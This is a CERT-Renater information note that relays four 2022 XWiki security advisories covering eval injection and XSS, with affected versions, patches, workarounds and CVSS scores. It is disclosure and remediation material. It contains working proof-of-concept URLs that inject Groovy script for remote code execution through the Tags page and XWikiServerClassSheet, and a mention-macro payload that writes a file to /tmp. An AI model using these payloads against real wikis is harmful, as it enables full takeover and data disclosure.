===================================================================== CERT-Renater Note d'Information No. 2022/VULN320 _____________________________________________________________________ DATE : 12/09/2022 HARDWARE PLATFORM(S): / OPERATING SYSTEM(S): Systems running org.xwiki.platform:xwiki-application-tag (Maven) versions >= 1.7, org.xwiki.platform:xwiki-platform-tag-ui (Maven) versions prior to 13.10.6,14.4, xwiki-platform-wiki-ui-mainwiki (Maven) versions prior to 13.10.6, 14.4, org.xwiki.platform:xwiki-platform-mentions-ui (Maven) versions prior to 14.4, 13.10.6, org.xwiki.platform:xwiki-platform-attachment-ui (Maven) versions prior to 14.4-rc-1. ===================================================================== https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-2g5c-228j-p52x https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-xr6m-2p4m-jvqf https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-c5v8-2q4r-5w9v https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-9r9j-57rf-f6vj _____________________________________________________________________ Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection') in xwiki-platform-tag-ui Critical surli published GHSA-2g5c-228j-p52x Package Affected versions Patched versions org.xwiki.platform:xwiki-application-tag (Maven) >= 1.7 None org.xwiki.platform:xwiki-platform-tag-ui (Maven) < 13.10.6, < 14.4 13.10.6,14.4 Description Impact The tags document Main.Tags in XWiki didn't sanitize user inputs properly, allowing users with view rights on the document (default in a public wiki or for authenticated users on private wikis) to execute arbitrary Groovy, Python and Velocity code with programming rights. This allows bypassing all rights checks and thus both modification and disclosure of all content stored in the XWiki installation. Also, this could be used to impact the availability of the wiki. Some versions of XWiki XML-escaped the tag (e.g., version 3.1) but this isn't a serious limitation as string literals can be delimited by / in Groovy and < and > aren't necessary, e.g., to elevate privileges of the current user. On XWiki versions before 13.10.4 and 14.2, this can be combined with the authentication bypass using the login action, meaning that no rights are required to perform the attack. The following URL demonstrates the attack: /xwiki/bin/login/Main/Tags?xpage=view&do=viewTag&tag=%7B%7Basync+async%3D%22true%22+cached%3D%22false%22+context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22hello+from+groovy%21%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D, where is the URL of the XWiki installations. On current versions (e.g, 14.3), the issue can be exploited by requesting the URL /xwiki/bin/view/Main/Tags?do=viewTag&tag=%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D, where is the URL of the server. On XWiki 2.0 (that contains version 1.7 of the tag application), the URL /xwiki/bin/view/Main/Tags?do=viewTag&tag={{/html}}{{groovy}}println(%2Fhello from groovy!%2F){{%2Fgroovy}} demonstrates the exploit while on XWiki 3.1 the following URL demonstrates the exploit: /xwiki/bin/view/Main/Tags?do=viewTag&tag={{/html}}{{footnote}}{{groovy}}println(%2Fhello%20from%20groovy!%2F){{%2Fgroovy}}{{/footnote}}. Patches This has been patched in the supported versions 13.10.6 and 14.4. Workarounds The patch that fixes the issue can be manually applied to the document Main.Tags or the updated version of that document can be imported from version 14.4 of xwiki-platform-tag-ui using the import feature in the administration UI on XWiki 10.9 and later (earlier versions might not be compatible with the current version of the document). References 6048680 https://jira.xwiki.org/browse/XWIKI-19747 For more information If you have any questions or comments about this advisory: Open an issue in Jira XWiki.org Email us at Security Mailing List Severity Critical 9.9/ 10 CVSS base metrics Attack vector Network Attack complexity Low Privileges required Low User interaction None Scope Changed Confidentiality High Integrity High Availability High CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H CVE ID CVE-2022-36100 Weaknesses CWE-95 _____________________________________________________________________ Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection') in xwiki-platform-wiki-ui-mainwiki Critical surli published GHSA-xr6m-2p4m-jvqf Package xwiki-platform-wiki-ui-mainwiki (Maven) Affected versions >=5.3-milestone-2 Patched versions 13.10.6,14.4 Description Impact It's possible to inject arbitrary wiki syntax including Groovy, Python and Velocity script macros via the request (URL parameter) using the XWikiServerClassSheet if the user has view access to this sheet and another page that has been saved with programming rights, a standard condition on a public read-only XWiki installation or a private XWiki installation where the user has an account. This allows arbitrary Groovy/Python/Velocity code execution which allows bypassing all rights checks and thus both modification and disclosure of all content stored in the XWiki installation. Also, this could be used to impact the availability of the wiki. On current versions (e.g., 14.3), this can be triggered by opening the URL /xwiki/bin/view/Main/?sheet=XWiki.XWikiServerClassSheet&form_token=&action=delete&domain=foo%22%2F%7D%7D%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D, on version 5.3 Milestone 2 (oldest impacted version), the issue can be reproduced using /xwiki/bin/view/Main/?sheet=WikiManager.XWikiServerClassSheet&form_token=&action=delete&domain=foo%22%2F%7D%7D%7B%7B%2Ferror%7D%7D%7B%7B%2Fhtml%7D%7D%7B%7Bfootnote%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22hello+from+groovy%21%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Ffootnote%7D%7D. In both cases is the URL of the XWiki installation and is the token used for CSRF protection for the current user which is available in every HTML response (search for form-token or form_token in the HTML source). If the string hello from groovy without println(" before it is displayed, the attack has been successful. Patches This has been patched in the supported versions 13.10.6 and 14.4. Workarounds It is possible to edit the affected document XWiki.XWikiServerClassSheet or WikiManager.XWikiServerClassSheet and manually perform the changes from the patch fixing the issue, i.e., replacing {{error}}{{translation key="platform.wiki.sheet.erroraliasalreadynotexists" parameters="$request.domain"/}}{{/error}} by {{error}}{{translation key="platform.wiki.sheet.erroraliasalreadynotexists" parameters="~"${services.rendering.escape($escapetool.java($request.domain), 'xwiki/2.1')}~""/}}{{/error}} and replacing {{error}}{{translation key="platform.wiki.sheet.erroraliasdoesnotexists" parameters="$request.domain"/}}{{/error}} by {{error}}{{translation key="platform.wiki.sheet.erroraliasdoesnotexists" parameters="~"${services.rendering.escape($escapetool.java($request.domain), 'xwiki/2.1')}~""/}}{{/error}} Note that below version 7.1 milestone 1, the used escaping function isn't available and thus a different fix would need to be developed. On XWiki versions 12.0 and later, it is also possible to import the document XWiki.XWikiServerClassSheet from the xwiki-platform-wiki-ui-mainwiki package version 14.4 using the import feature of the administration application as there have been no other changes to this document since XWiki 12.0. References fc77f9f https://jira.xwiki.org/browse/XWIKI-19746 For more information If you have any questions or comments about this advisory: Open an issue in Jira XWiki.org Email us at Security Mailing List Severity Critical 9.9/ 10 CVSS base metrics Attack vector Network Attack complexity Low Privileges required Low User interaction None Scope Changed Confidentiality High Integrity High Availability High CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H CVE ID CVE-2022-36099 Weaknesses CWE-95 _____________________________________________________________________ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in org.xwiki.platform:xwiki-platform-mentions-ui Critical surli published GHSA-c5v8-2q4r-5w9v Package org.xwiki.platform:xwiki-platform-mentions-ui (Maven) Affected versions >= 12.5-rc-1 Patched versions 14.4, 13.10.6 Description Impact It's possible to store Javascript or groovy scripts in an mention macro anchor or reference field. The stored code is executed by anyone visiting the page with the mention. For example, the example below will create a file at /tmp/exploit.txt: {{mention reference="XWiki.Translation" anchor="{{/html~}~}{{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit.txt~").withWriter { out -> out.println(~"owned!~"); }{{/groovy~}~}{{/async~}~}"/}} Patches This issue has been patched on XWiki 14.4 and 13.10.6. Workarounds It's possible to fix the vulnerability by updating XWiki.Mentions.MentionsMacro and edit the Macro code field of the XWiki.WikiMacroClass XObject. $content Must be replaced by $escapetool.xml($content) See the patches: 14.4: 4f290d8 13.10.6: 4032dc8#diff-4fe22885f772e47d3561a05348f73921669ec12d4413b220383b73c7ae484bc4R608-R610 References https://jira.xwiki.org/browse/XWIKI-19752 For more information If you have any questions or comments about this advisory: Open an issue in Jira XWiki.org Email us at Security Mailing List Severity Critical 9.9/ 10 CVSS base metrics Attack vector Network Attack complexity Low Privileges required Low User interaction None Scope Changed Confidentiality High Integrity High Availability High CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H CVE ID CVE-2022-36098 Weaknesses CWE-95 _____________________________________________________________________ XSS in the move attachment form High surli published GHSA-9r9j-57rf-f6vj yesterday Package org.xwiki.platform:xwiki-platform-attachment-ui (Maven) Affected versions >= 14.0-rc-1 Patched versions 14.4-rc-1 Description Impact It's possible to store JavaScript in an attachment name, which will be executed by anyone trying to move the corresponding attachment. For example, an attachment with name >.jpg will execute the alert. Patches This issue has been patched in XWiki 14.4RC1. Workarounds It is possible to fix the vulnerability by copying moveStep1.vm to webapp/xwiki/templates/moveStep1.vm and replace #set($titleToDisplay = $services.localization.render('attachment.move.title', [$attachment.name, $escapetool.xml($doc.plainTitle), $doc.getURL()])) by #set($titleToDisplay = $services.localization.render('attachment.move.title', [ $escapetool.xml($attachment.name), $escapetool.xml($doc.plainTitle), $escapetool.xml($doc.getURL()) ])) See the corresponding patch. References https://jira.xwiki.org/browse/XWIKI-19667 For more information If you have any questions or comments about this advisory: Open an issue in Jira XWiki.org Email us at Security Mailing List Severity High 8.9/ 10 CVSS base metrics Attack vector Network Attack complexity Low Privileges required Low User interaction Required Scope Changed Confidentiality High Integrity High Availability Low CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L CVE ID CVE-2022-36097 Weaknesses CWE-80 ========================================================= + CERT-RENATER | tel : 01-53-94-20-44 + + 23/25 Rue Daviel | fax : 01-53-94-20-41 + + 75013 Paris | email:cert@support.renater.fr + =========================================================